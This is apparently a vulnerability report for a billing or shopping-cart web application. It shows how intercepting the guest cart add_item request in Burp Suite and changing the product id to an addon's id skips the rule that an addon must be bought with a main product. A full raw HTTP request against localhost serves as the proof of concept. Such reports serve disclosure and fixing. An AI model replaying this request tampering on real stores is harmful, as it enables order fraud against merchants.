Description

I find a requirement that addons must be purchased in conjunction with a product. However, a vulnerability has been discovered where an attacker can modify the product ID during the order process, allowing them to bypass the main product order requirement and directly purchase the addon.

Proof of Concept

1 user orders the product

2 using burpsuit hijack the request

POST /index.php?_url=/api/guest/cart/add_item HTTP/1.1
Host: localhost
Content-Length: 58
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
sec-ch-ua-platform: "macOS"
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/orderbutton?order=8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: BOXCLR=e%3DdXNlcjNAdGVzdC5jb20%3D%26p%3DJDJ5JDEwJEltbDNnQXl0di8xdy5wZFpWQW9pNi40UVhsSnd3R2h5OENCT0VCYVp3ZmhGc2paU3N5UzJx; ADMIDIO_admidio_adm_SESSION_ID=28c355e130917b8a2f817792256db866; ADMIDIO_admidio_adm_cookieconsent_status=dismiss; PHPSESSID=9fd364ab4e45a218a605f6129bfec942; BBLANG=en_US
Connection: close

CSRFToken=593265e9721d74ae839c486bc5a96102&form_id=1&id=6&&multiple=1&id=1

3 change the id = 1 as id =6

4 id = 6 means that id of one addon is 6

5 send reqeust and find success.